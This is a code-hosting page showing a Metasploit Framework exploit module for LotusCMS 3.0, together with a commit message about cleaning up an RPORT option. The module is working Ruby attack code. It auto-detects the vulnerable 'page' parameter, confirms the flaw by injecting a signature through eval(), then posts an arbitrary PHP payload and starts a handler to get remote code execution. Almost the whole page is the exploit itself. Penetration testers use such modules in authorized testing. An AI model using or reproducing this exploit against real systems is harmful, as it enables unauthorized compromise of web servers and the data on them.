adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ca0fc0f950f875ed74c19b892063750962ebd3fa
metasploit-gs/modules/exploits/multi/http/lcms_php_exec.rb
T
Christian Mehlmauer 3752c10ccf Adding FireFart's RPORT(80) cleanup 
This was tested by creating a resource script to load every changed
module and displaying the options, like so:

````
use auxiliary/admin/2wire/xslt_password_reset
show options
use auxiliary/admin/http/contentkeeper_fileaccess
show options
````

...etc. This was run in both the master branch and FireFart's branch
while spooling out the results of msfconsole, then diffing those
results. All modules loaded successfully, and there were no changes to
the option sets, so it looks like a successful fix.

Thanks FireFart!

Squashed commit of the following:

commit 7c1eea53fe3743f59402e445cf34fab84cf5a4b7
Author: Christian Mehlmauer <FireFart@gmail.com>
Date:   Fri May 25 22:09:42 2012 +0200

    Cleanup Opt::RPORT(80) since it is already registered by Msf::Exploit::Remote::HttpClient
2012-06-02 09:53:19 -05:00

147 lines
4.0 KiB
Ruby
Raw Blame History

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WmapScanUniqueQuery
def initialize(info = {})
super(update_info(info,
'Name' => 'LotusCMS 3.0 eval() Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability found in Lotus CMS 3.0's Router()
function. This is done by embedding PHP code in the 'page' parameter,
which will be passed to a eval call, therefore allowing remote code execution.
The module can either automatically pick up a 'page' parameter from the
default page, or manually specify one in the URI option. To use the automatic
method, please supply the URI with just a directory path, for example: "/lcms/".
To manually configure one, you may do: "/lcms/somepath/index.php?page=index"
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alligator Security Team',
'dflah_ <dflah_[at]alligatorteam.org>',
'sherl0ck_ <sherl0ck_[at]alligatorteam.org>',
'sinn3r' #Metasploit-fu
],
'References' =>
[
[ 'OSVDB', '75095' ],
[ 'URL', 'http://secunia.com/secunia_research/2011-21/' ]
],
'Payload' =>
{
'Space' => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
'DisableNops' => true,
'BadChars' => "#",
'Keys' => ['php']
},
'Platform' => [ 'php' ],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic LotusCMS 3.0', { }]],
'Privileged' => false,
'DisclosureDate' => 'Mar 3 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, 'URI', '/lcms/'])
], self.class)
end
def target_url
uri = datastore['URI']
# Make sure uri begins with '/'
if uri[0] != '/'
uri = '/' + uri
end
# Extract two things:
# 1. The file path (/index.php), including the base
# 2. GET parameters from the GET query
uri = uri.scan(/^(\/.+)\/(\w+\.php)*\?*(\w+=.+&*)*$/).flatten
base = (uri[0] || "") + '/'
fname = uri[1] || ""
query = uri[2] || ""
params = queryparse(query) rescue ""
# Use the user-supplied query if there's one, if not we'll auto-detect
# by regexing a hyper-link
if base.empty? or fname.empty? or params.empty?
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['URI']
}, 20)
if res and res.code == 200
uri = res.body.scan(/<a.*href=['|"](\/*index\.php)\?.*(page=\w+)['|"].*>/).flatten
@uri = base + uri[0]
@arg = uri[1]
print_status("Using found page param: #{@uri}?#{@arg}")
else
@uri = ""
@arg = ""
end
else
@uri = base + fname
@arg = "page=#{params['page']}"
end
end
def check
target_url
if @uri.empty? or @arg.empty?
print_error("Unable to get the page parameter, please reconfigure URI")
return
end
signature = rand_text_alpha(rand(10)+10)
stub = "${print('#{signature}')};"
sploit = "');#{stub}#"
response = send_request_cgi(
{
'method' => 'POST',
'uri' => @uri,
'data' => @arg + Rex::Text.uri_encode(sploit)
}, 20)
if response and response.body =~ /#{signature}/
print_status("Signature: #{signature}")
return Exploit::CheckCode::Vulnerable
else
print_error("Signature was not detected")
return Exploit::CheckCode::Safe
end
end
def exploit
return if not check == Exploit::CheckCode::Vulnerable
begin
sploit = "');#{payload.encoded}#"
print_status("Sending exploit ...")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => @uri,
'data' => @arg + Rex::Text.uri_encode(sploit)
}, 20)
handler
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
Reference in New Issue View Git Blame Copy Permalink